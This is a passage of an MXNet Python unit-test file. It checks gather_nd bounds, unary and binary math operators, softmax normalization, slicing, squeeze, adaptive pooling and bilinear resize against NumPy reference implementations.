def test_gather_nd_check_bound():
def _test_gather_nd_exception(data, indices):
output = mx.nd.gather_nd(data, indices).asnumpy()
# check if indices are out of bounds
data = mx.nd.array([[0, 1, 2], [3, 4, 5]])
indices1 = mx.nd.array([[0, 1, 0], [0, 1, 3]])
indices2 = mx.nd.array([[0, 1, 0], [0, 1, -5]])
assertRaises(IndexError, _test_gather_nd_exception, data, indices1)
# IndexError: index 3 is out of bounds for axis 1 with size 3
assertRaises(IndexError, _test_gather_nd_exception, data, indices2)
# IndexError: index -5 is out of bounds for axis 1 with size 3
# check if the negative indices are wrapped correctly
indices1 = mx.nd.array([[0, 1, -1], [0, 1, -2]])
indices2 = mx.nd.array([[0, 1, 1], [0, 1, 1]])
data1 = mx.nd.gather_nd(data, indices1)
data2 = mx.nd.gather_nd(data, indices2)
assert_almost_equal(data1, data2, rtol=1e-5, atol=1e-5)
def compare_forw_backw_unary_op(
name, forward_mxnet_call, forward_numpy_call,
backward_numpy_call, shape, input_low, input_high, rtol, atol,
dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
data = mx.symbol.Variable(op_name + '_data', dtype=dtype)
# Comparison: Forward expression
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
res_np = forward_numpy_call(data_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_fw(op_ex, [data_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data_grad = backward_numpy_call(data_np) * res_grad
check_bw(op_ex, [data_np], [res_grad], [data_grad])
def finite_diff_unary_op(
name, forward_mxnet_call, shape, input_low, input_high, rtol, atol,
num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
data = mx.symbol.Variable('data', dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_grad(op_ex, [data_np])
def np_smooth_l1(x, sigma):
issq = 1. / sigma / sigma
absx = np.abs(x)
temp = x * sigma
return np.where(absx < issq, 0.5 * (temp ** 2), absx - 0.5 * issq)
def np_smooth_l1_grad(x, sigma):
ssq = sigma * sigma
return np.where(np.abs(x) < 1. / ssq, x * ssq, np.sign(x))
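# Illustrative-only sketch (not part of the original tests): spot-check of the
# piecewise smooth-L1 definition above. With sigma = 1 the switch point is
# |x| = 1: quadratic branch 0.5 * x**2 inside, linear branch |x| - 0.5 outside.
# The function below is a hypothetical helper and is not called by the test suite.
def _example_smooth_l1_values():
    assert np.isclose(np_smooth_l1(np.array(0.5), 1.), 0.125)
    assert np.isclose(np_smooth_l1(np.array(2.0), 1.), 1.5)
    assert np.isclose(np_smooth_l1_grad(np.array(0.5), 1.), 0.5)  # d/dx of 0.5*x^2 is x
    assert np.isclose(np_smooth_l1_grad(np.array(2.0), 1.), 1.0)  # d/dx of (x - 0.5) is 1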
# Tests for unary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
# Seed set because the test is not robust enough to operate on random data
@with_seed(192837465)
def test_unary_math_operators():
have_scipy = True
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
have_scipy = False
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
rtol_less_l = [1e-6, 1e-5, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
atol_less_l = [1e-6, 1e-5, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'arccos' : [lambda x: mx.sym.arccos(x),
lambda x: np.arccos(x),
lambda x: -1. / np.sqrt(1. - x ** 2.),
-0.95, 0.95],
'arccosh': [lambda x: mx.sym.arccosh(x),
lambda x: np.arccosh(x),
lambda x: 1. / np.sqrt(x ** 2 - 1.),
1.05, 10.0],
'arcsin': [lambda x: mx.sym.arcsin(x),
lambda x: np.arcsin(x),
lambda x: 1. / np.sqrt(1. - x ** 2),
-0.95, 0.95],
'arcsinh': [lambda x: mx.sym.arcsinh(x),
lambda x: np.arcsinh(x),
lambda x: 1. / np.sqrt(x**2 + 1.),
-5.0, 5.0],
'arctan': [lambda x: mx.sym.arctan(x),
lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.),
-5.0, 5.0],
'arctanh': [lambda x: mx.sym.arctanh(x),
lambda x: np.arctanh(x),
lambda x: 1. / (1. - x ** 2),
-0.95, 0.95],
'cbrt': [lambda x: mx.sym.cbrt(x),
lambda x: np.cbrt(x),
lambda x: 1. / (3. * np.cbrt(x) ** 2),
-10.0, 10.0],
'cos': [lambda x: mx.sym.cos(x),
lambda x: np.cos(x),
lambda x: -np.sin(x),
-5.0, 5.0],
'cosh': [lambda x: mx.sym.cosh(x),
lambda x: np.cosh(x),
lambda x: np.sinh(x),
-2.0, 2.0],
'exp': [lambda x: mx.sym.exp(x),
lambda x: np.exp(x),
lambda x: np.exp(x),
-4.0, 4.0],
'expm1': [lambda x: mx.sym.expm1(x),
lambda x: np.expm1(x),
lambda x: np.exp(x),
-0.1, 0.1],
'log': [lambda x: mx.sym.log(x),
lambda x: np.log(x),
lambda x: 1. / x,
0.01, 100.0],
'log10': [lambda x: mx.sym.log10(x),
lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)),
0.01, 100.0],
'log2': [lambda x: mx.sym.log2(x),
lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)),
0.01, 100.0],
'log1p': [lambda x: mx.sym.log1p(x),
lambda x: np.log1p(x),
lambda x: 1. / (1. + x),
-0.1, 0.1],
'rcbrt': [lambda x: mx.sym.rcbrt(x),
lambda x: 1. / np.cbrt(x),
lambda x: -1. / (3. * x * np.cbrt(x)),
0.01, 100.0],
'reciprocal': [lambda x: mx.sym.reciprocal(x),
lambda x: 1. / x,
lambda x: -1. / (x ** 2),
0.01, 100.0],
'relu': [lambda x: mx.sym.relu(x),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'rsqrt': [lambda x: mx.sym.rsqrt(x),
lambda x: 1. / np.sqrt(x),
lambda x: -0.5 / (x * np.sqrt(x)),
0.01, 100.0],
'sigmoid': [lambda x: mx.sym.sigmoid(x),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.softsign(x),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
'sin': [lambda x: mx.sym.sin(x),
lambda x: np.sin(x),
lambda x: np.cos(x),
-5.0, 5.0],
'sinh': [lambda x: mx.sym.sinh(x),
lambda x: np.sinh(x),
lambda x: np.cosh(x),
-2.0, 2.0],
'sqrt': [lambda x: mx.sym.sqrt(x),
lambda x: np.sqrt(x),
lambda x: 0.5 / np.sqrt(x),
0.01, 100.0],
'tan': [lambda x: mx.sym.tan(x),
lambda x: np.tan(x),
lambda x: np.tan(x) ** 2 + 1.,
-1.5, 1.5],
'tanh': [lambda x: mx.sym.tanh(x),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'smooth_l1_sig1': [lambda x: mx.sym.smooth_l1(x, scalar=1.),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig_default': [lambda x: mx.sym.smooth_l1(x),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig2': [lambda x: mx.sym.smooth_l1(x, scalar=2.),
lambda x: np_smooth_l1(x, 2.),
lambda x: np_smooth_l1_grad(x, 2.),
-1.0, 1.0]
}
if have_scipy:
unary_ops['gamma'] = [lambda x: mx.sym.gamma(x),
lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x),
0.01, 5.0]
unary_ops['gammaln'] = [lambda x: mx.sym.gammaln(x),
lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x),
0.01, 20.0]
# Loop over operators
for name, op in unary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
if name == 'gammaln' or name == 'gamma':
rtol = rtol_less_l[ind]
atol = atol_less_l[ind]
else:
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
def compare_forw_backw_binary_op(
name, forward_mxnet_call, forward_numpy_call,
backward1_numpy_call, backward2_numpy_call, shape, input1_low,
input1_high, input2_low, input2_high, rtol, atol, dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
data1 = mx.symbol.Variable(op_name + '_data1', dtype=dtype)
data2 = mx.symbol.Variable(op_name + '_data2', dtype=dtype)
# Comparison: Forward expression
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
res_np = forward_numpy_call(data1_np, data2_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_fw(op_ex, [data1_np, data2_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data1_grad = backward1_numpy_call(data1_np, data2_np) * res_grad
data2_grad = backward2_numpy_call(data1_np, data2_np) * res_grad
check_bw(op_ex, [data1_np, data2_np], [res_grad], [data1_grad, data2_grad])
def finite_diff_binary_op(
name, forward_mxnet_call, shape, input1_low, input1_high, input2_low,
input2_high, rtol, atol, num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
data1 = mx.symbol.Variable('data1', dtype=dtype)
data2 = mx.symbol.Variable('data2', dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_grad(op_ex, [data1_np, data2_np])
# Tests for binary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
@with_seed()
def test_binary_math_operators():
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
binary_ops = {
'hypot' : [lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
-5.0, 5.0, -5.0, 5.0],
'pow': [lambda x, y: mx.sym.pow(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0],
'power': [lambda x, y: mx.sym.power(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0]
}
# Loop over operators
for name, op in binary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
compare_forw_backw_binary_op(
name, op[0], op[1], op[2], op[3], shape, op[4], op[5], op[6],
op[7], rtol_l[ind], atol_l[ind], dtype)
# Finite difference testing
finite_diff_binary_op(
name, op[0], shape, op[4], op[5], op[6], op[7], rtol_fd, atol_fd,
num_eps)
@with_seed()
def test_softmax():
check_softmax_with_shape((3, 4), default_context(), preserve_shape=False)
check_softmax_with_shape((3, 4), default_context(), preserve_shape=True)
check_softmax_with_shape((3, 4, 2), default_context(), preserve_shape=True)
check_softmax_grad(default_context())
check_smoothed_softmax_grad(default_context())
@with_seed()
def test_softmax_output_normalization():
def _softmaxoutput_normalization(multi_output, use_ignore, normalization):
grad_scale = np.random.random()
batch_size = 8
num_labels = 6
H, W = 3, 3
ignore_label = np.random.randint(0, num_labels) if use_ignore else -1
if multi_output:
data_shape = (batch_size, num_labels, H, W)
label_shape = (batch_size, H, W)
else:
data_shape = (batch_size, num_labels)
label_shape = (batch_size, )
data = mx.nd.random.uniform(-1, 1, shape=data_shape)
label = mx.nd.random.randint(
0, num_labels, shape=label_shape).astype('float32')
data.attach_grad()
kwargs = dict(grad_scale=grad_scale,
normalization=normalization, multi_output=multi_output)
if use_ignore:
kwargs.update(use_ignore=True, ignore_label=ignore_label)
with mx.autograd.record():
out = mx.nd.SoftmaxOutput(data=data, label=label, **kwargs)
out.backward(mx.nd.ones_like(data))
exp_data = mx.nd.exp(data)
softmax_data = exp_data / exp_data.sum(1, keepdims=True)
argmax_data = mx.nd.argmax(data, axis=1)
assert_almost_equal(out.asnumpy(), softmax_data.asnumpy())
one_hot_label = mx.nd.one_hot(label, num_labels)
if multi_output:
one_hot_label = one_hot_label.transpose((0, 3, 1, 2))
data_grad = softmax_data - one_hot_label
if use_ignore:
if multi_output:
data_grad *= (label !=
ignore_label).reshape((batch_size, 1, H, W))
else:
data_grad *= (label != ignore_label).reshape((batch_size, 1))
valid_cnt = 1
if normalization == 'batch':
valid_cnt = batch_size
elif normalization == 'valid':
valid_cnt = mx.nd.maximum(1, (label != ignore_label).sum())
scale = grad_scale / valid_cnt
if multi_output:
if normalization != 'valid':
scale /= H * W
data_grad *= scale
assert_almost_equal(data.grad.asnumpy(), data_grad.asnumpy())
for multi_output in [False, True]:
for use_ignore in [False, True]:
for normalization in ['null', 'batch', 'valid']:
_softmaxoutput_normalization(
multi_output, use_ignore, normalization)
@with_seed()
def test_slice():
def test_slice_forward_backward(a, index):
a_np = a.asnumpy()
begin = []
end = []
step = []
for slice_i in index:
begin.append(slice_i.start)
end.append(slice_i.stop)
step.append(slice_i.step)
b = mx.nd.slice(a, begin=begin, end=end, step=step)
b_np = a_np[index]
assert same(b.asnumpy(), b_np)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=begin, end=end, step=step)
expected_in_grad = np.zeros_like(a_np)
expected_in_grad[index] = b_np
check_symbolic_backward(slice_sym, [a_np], [b_np], [expected_in_grad])
shape = (16, 14, 17, 20)
arr = mx.nd.arange(np.prod(shape)).reshape(shape=shape)
index_list = [(slice(None),), (slice(None), slice(None)), (slice(1, 10),), (slice(1, 10), slice(3, 9)),
(slice(1, 10), slice(2, 5), slice(3, 6), slice(7, 10)),
(slice(1, 10, 2), slice(2, 9, 3), slice(3, 6, 5), slice(7, 10, 2)),
(slice(None, None, -1), slice(None, None, -1), slice(None, None, -1)),
(slice(10, 0, -2), slice(5, 2, -1), slice(7, None, 3), slice(None, 12, 4))]
for index in index_list:
test_slice_forward_backward(arr, index)
# check numeric gradient
in_data = np.arange(36).reshape(2, 2, 3, 3)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=[0, None], end=[1, None], step=[2, -1])
check_numeric_gradient(slice_sym, [in_data])
def test_slice_partial_infer():
def check_slice_partial_infer(data, begin, end, step, expected_out_shape):
out = mx.sym.slice(data, begin=begin, end=end, step=step)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
def check_slice_axis_partial_infer(data, axis, begin, end, expected_out_shape):
out = mx.sym.slice_axis(data, axis=axis, begin=begin, end=end)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
var1 = mx.sym.var(name="data", shape=(0, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (0, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (0, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (0, 3))
var1 = mx.sym.var(name="data", shape=(10, 0))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, 0))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, 0))
with mx.np_shape():
var1 = mx.sym.var(name="data", shape=(-1, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (-1, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (-1, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (-1, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (-1, 3))
var1 = mx.sym.var(name='data', shape=(10, -1))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, -1))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, -1))
@with_seed()
def test_float16_min_max():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/9007"""
a = mx.nd.array([np.finfo('float16').min, np.finfo('float16').max], dtype='float16')
assert a.dtype == np.float16
assert np.finfo('float16').min == mx.nd.min(a).asscalar()
assert np.finfo('float16').max == mx.nd.max(a).asscalar()
@with_seed()
@mx.use_np_shape
def test_zero_size_min_max():
def min():
a = mx.nd.zeros(shape=(5, 0))
a.min()
def max():
a = mx.nd.zeros(shape=(5, 0))
a.max()
assert_raises(MXNetError, min)
assert_raises(MXNetError, max)
@with_seed()
def test_squeeze_op():
def check_squeeze_op(shape, axis=None):
data = mx.nd.random.uniform(low=-10.0, high=10.0, shape=shape)
if axis is None:
out = mx.nd.squeeze(data).asnumpy()
out_expected = np.squeeze(data.asnumpy())
else:
out = mx.nd.squeeze(data, axis=axis).asnumpy()
out_expected = np.squeeze(data.asnumpy(), axis=axis)
        if out.shape == (1,):  # unlike numpy, an all-ones shape such as (1, 1, 1, 1) is squeezed to (1,) rather than to a scalar
out_expected = np.squeeze(data.asnumpy(), axis=tuple([i for i in range(1, len(shape))]))
assert same(out, out_expected)
# check forward
check_squeeze_op((1, 5, 1, 3, 1), 0)
check_squeeze_op((1, 5, 1, 3, 1), 2)
check_squeeze_op((1, 5, 1, 3, 1), 4)
check_squeeze_op((1, 5, 1, 3, 1), (0, 4))
check_squeeze_op((1, 5, 1, 3, 1), (0, 2, 4))
check_squeeze_op((1, 5, 1, 3, 1))
check_squeeze_op((1, 1, 1, 1))
# check gradient
data = mx.symbol.Variable('data')
shape = (1, 2, 1, 3, 1)
data_tmp = np.ones(shape)
test = mx.sym.squeeze(data)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=2)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=(2, 4))
check_numeric_gradient(test, [data_tmp])
@with_seed()
def test_adaptive_avg_pool_op():
def py_adaptive_avg_pool(x, height, width):
# 2D per frame adaptive avg pool
def adaptive_avg_pool_frame(x, y):
isizeH, isizeW = x.shape
osizeH, osizeW = y.shape
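            # Each output cell (oh, ow) averages the input window
            # [floor(oh * isizeH / osizeH), ceil((oh + 1) * isizeH / osizeH)) x
            # [floor(ow * isizeW / osizeW), ceil((ow + 1) * isizeW / osizeW)),
            # i.e. the usual adaptive average pooling bins.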
for oh in range(osizeH):
istartH = int(np.floor(1.0 * (oh * isizeH) / osizeH))
iendH = int(np.ceil(1.0 * (oh + 1) * isizeH / osizeH))
kH = iendH - istartH
for ow in range(osizeW):
istartW = int(np.floor(1.0 * (ow * isizeW) / osizeW))
iendW = int(np.ceil(1.0 * (ow + 1) * isizeW / osizeW))
kW = iendW - istartW
xsum = 0
for ih in range(kH):
for iw in range(kW):
xsum += x[istartH+ih][istartW+iw]
y[oh][ow] = xsum / kH / kW
B,C,_,_ = x.shape
y = np.empty([B,C,height, width], dtype=x.dtype)
for b in range(B):
for c in range(C):
adaptive_avg_pool_frame(x[b][c], y[b][c])
return y
def check_adaptive_avg_pool_op(shape, output_height, output_width=None):
x = mx.nd.random.uniform(shape=shape)
if output_width is None:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=output_height)
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_height)
else:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=(output_height, output_width))
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_width)
assert_almost_equal(y.asnumpy(), npy)
shape = (2, 2, 10, 10)
for i in range(1, 11):
check_adaptive_avg_pool_op(shape, i)
for j in range(1, 11):
check_adaptive_avg_pool_op(shape, i, j)
@with_seed()
def test_bilinear_resize_op():
def py_bilinear_resize(x, outputHeight, outputWidth):
batch, channel, inputHeight, inputWidth = x.shape
if outputHeight == inputHeight and outputWidth == inputWidth:
return x
y = np.empty([batch, channel, outputHeight, outputWidth])
rheight = 1.0 * (inputHeight - 1) / (outputHeight - 1) if outputHeight > 1 else 0.0
rwidth = 1.0 * (inputWidth - 1) / (outputWidth - 1) if outputWidth > 1 else 0.0
for h2 in range(outputHeight):
h1r = 1.0 * h2 * rheight
h1 = int(np.floor(h1r))
h1lambda = h1r - h1
h1p = 1 if h1 < (inputHeight - 1) else 0
for w2 in range(outputWidth):
w1r = 1.0 * w2 * rwidth
w1 = int(np.floor(w1r))
w1lambda = w1r - w1
w1p = 1 if w1 < (inputWidth - 1) else 0
for b in range(batch):
for c in range(channel):
y[b][c][h2][w2] = (1-h1lambda)*((1-w1lambda)*x[b][c][h1][w1] + \
w1lambda*x[b][c][h1][w1+w1p]) + \
h1lambda*((1-w1lambda)*x[b][c][h1+h1p][w1] + \
w1lambda*x[b][c][h1+h1p][w1+w1p])
return y
def py_bilinear_resize_backward(x, incoming_grads, mode='size'):
data1 = np.zeros_like(x)
data2 = incoming_grads
batchsize = data1.shape[0]
channels = data1.shape[1]
height1 = data1.shape[2]
width1 = data1.shape[3]
height2 = data2.shape[2]
width2 = data2.shape[3]
rheight = float(height1 - 1) / (height2 - 1) if (height2 > 1) else 0
rwidth = float(width1 - 1) / (width2 - 1) if (width2 > 1) else 0
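        # The backward pass scatters each incoming gradient element to the four
        # neighbouring input pixels, reusing the bilinear weights from the forward pass.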
# special case: just copy
if height1 == height2 and width1 == width2:
data1 += data2
return [data1]
for h2 in range(0, height2):
for w2 in range(0, width2):
h1r = rheight * h2
h1 = int(h1r)
h1p = 1 if (h1 < height1 - 1) else 0
h1lambda = h1r - h1
h0lambda = 1 - h1lambda
#
w1r = rwidth * w2
w1 = int(w1r)
w1p = 1 if (w1 < width1 - 1) else 0
w1lambda = w1r - w1
w0lambda = 1 - w1lambda
#
for n in range(0, batchsize):
for c in range(0, channels):
d2val = data2[n][c][h2][w2]
data1[n][c][h1][w1] += h0lambda * w0lambda * d2val
data1[n][c][h1][w1 + w1p] += h0lambda * w1lambda * d2val
data1[n][c][h1 + h1p][w1] += h1lambda * w0lambda * d2val
data1[n][c][h1 + h1p][w1 + w1p] += h1lambda * w1lambda * d2val
if mode == 'like':
return data1, np.zeros_like(incoming_grads)
return [data1]
def check_bilinear_resize_op(shape, height, width):
x = mx.nd.random.uniform(shape=shape)
y = mx.nd.contrib.BilinearResize2D(x, height=height, width=width)
assert_almost_equal(y, py_bilinear_resize(x.asnumpy(), height, width))
x_scale = width / shape[-1]
y_scale = height / shape[-2]
y = mx.nd.contrib.BilinearResize2D(x, scale_height=y_scale, scale_width=x_scale)
assert_almost_equal(y.asnumpy(), py_bilinear_resize(x.asnumpy(), height, width))
def check_bilinear_resize_align_corners_op():
img_shape = [1, 1, 3, 2]
data = [64, 32, 32, 64, 50, 100]
target_height = 6
target_width = 4
expected_data = {}
# align_corners = False
expected_data[0] = [
64.000, 56.000, 40.000, 32.000, 56.000, 52.000, 44.000, 40.000, 40.000, 44.000, 52.000, 56.000,
36.500, 45.625, 63.875, 73.000, 45.500, 56.875, 79.625, 91.000, 50.000, 62.500, 87.500, 100.000
]
# align_corners = True
expected_data[1] = [
64.000, 53.333, 42.667, 32.000, 51.200, 49.067, 46.933, 44.800, 38.400, 44.800, 51.200, 57.600,
35.600, 47.467, 59.333, 71.200, 42.800, 57.067, 71.333, 85.600, 50.000, 66.667, 83.333, 100.000
]
x = np.array(data, dtype=np.float32).reshape(img_shape)
x_nd = mx.nd.array(x)
y0 = np.array(expected_data[0]).reshape((1, 1, target_height, target_width))
y0_nd = mx.nd.contrib.BilinearResize2D(x_nd, height=target_height, width=target_width, mode='size', align_corners=False)
assert_almost_equal(y0, y0_nd.asnumpy(), atol=1e-3)
y1 = np.array(expected_data[1]).reshape((1, 1, target_height, target_width))
y1_nd = mx.nd.contrib.BilinearResize2D(x_nd, height=target_height, width=target_width, mode='size', align_corners=True)
assert_almost_equal(y1, y1_nd.asnumpy(), atol=1e-3)
def check_bilinear_resize_modes_op(shape, scale_height=None, scale_width=None, shape_1=None, mode=None):
x = mx.nd.random.uniform(shape=shape)
original_h = shape[2]
original_w = shape[3]
if mode == 'odd_scale':
assert scale_height is not None and scale_width is not None
new_h = int(original_h * scale_height) if (original_h % 2) == 0 else \
int((original_h - 1) * scale_height) + 1
new_w = int(original_w * scale_width) if (original_w % 2) == 0 \
else int((original_w - 1) * scale_width) + 1
y = mx.nd.contrib.BilinearResize2D(x, scale_height=scale_height,
scale_width=scale_width,
mode='odd_scale')
elif mode == 'to_even_down':
new_h = original_h if (original_h % 2) == 0 else original_h - 1
new_w = original_w if (original_w % 2) == 0 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_down')
elif mode == 'to_even_up':
new_h = original_h if (original_h % 2) == 0 else original_h + 1
new_w = original_w if (original_w % 2) == 0 else original_w + 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_up')
elif mode == 'to_odd_down':
new_h = original_h if (original_h % 2) == 1 else original_h - 1
new_w = original_w if (original_w % 2) == 1 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_down')
elif mode == 'to_odd_up':
new_h = original_h if (original_h % 2) == 1 else original_h + 1
new_w = original_w if (original_w % 2) == 1 else original_w + 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_up')
elif mode == 'like':
x_1 = mx.nd.random.uniform(shape=shape_1)
new_h = x_1.shape[2]
new_w = x_1.shape[3]
y = mx.nd.contrib.BilinearResize2D(x, x_1, mode='like')
new_shape_desired = np.array([shape[0], shape[1], new_h, new_w], dtype='int')
new_shape_got = np.array(y.shape, dtype='int')
data_sym = mx.sym.var('data')
data_np = x.asnumpy()
expected = py_bilinear_resize(data_np, new_h, new_w)
out_grads = np.ones([shape[0], shape[1], new_h, new_w])
expected_backward = py_bilinear_resize_backward(data_np, out_grads, mode)
assert_array_equal(new_shape_desired, new_shape_got, "Desired and got shapes are not equal. {} vs {}".format(
str(new_shape_desired.tolist()), str(new_shape_got.tolist())))
assert_almost_equal(y.asnumpy(), expected, 1e-3, 0)
if mode != 'like':
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, None, scale_height=scale_height, scale_width=scale_width, mode=mode)
check_symbolic_forward(resize_sym, [data_np], [expected], rtol=1e-3, atol=1e-5)
check_symbolic_backward(resize_sym, [data_np], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
check_numeric_gradient(resize_sym, [data_np], rtol=1e-2, atol=1e-4)
else:
data_sym_like = mx.sym.var('data_like')
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, data_sym_like, mode=mode)
            data_np_like = x_1.asnumpy()
            check_symbolic_forward(resize_sym, [data_np, data_np_like], [expected], rtol=1e-3, atol=1e-5)
            check_symbolic_backward(resize_sym, [data_np, data_np_like], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
            check_numeric_gradient(resize_sym, [data_np, data_np_like], rtol=1e-2, atol=1e-4)
shape = (2, 2, 10, 10)
check_bilinear_resize_op(shape, 5, 5)
check_bilinear_resize_op(shape, 10, 10)
check_bilinear_resize_op(shape, 15, 15)
check_bilinear_resize_op(shape, 3, 7)
check_bilinear_resize_op(shape, 13, 17)
shape = (2, 2, 20, 20)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
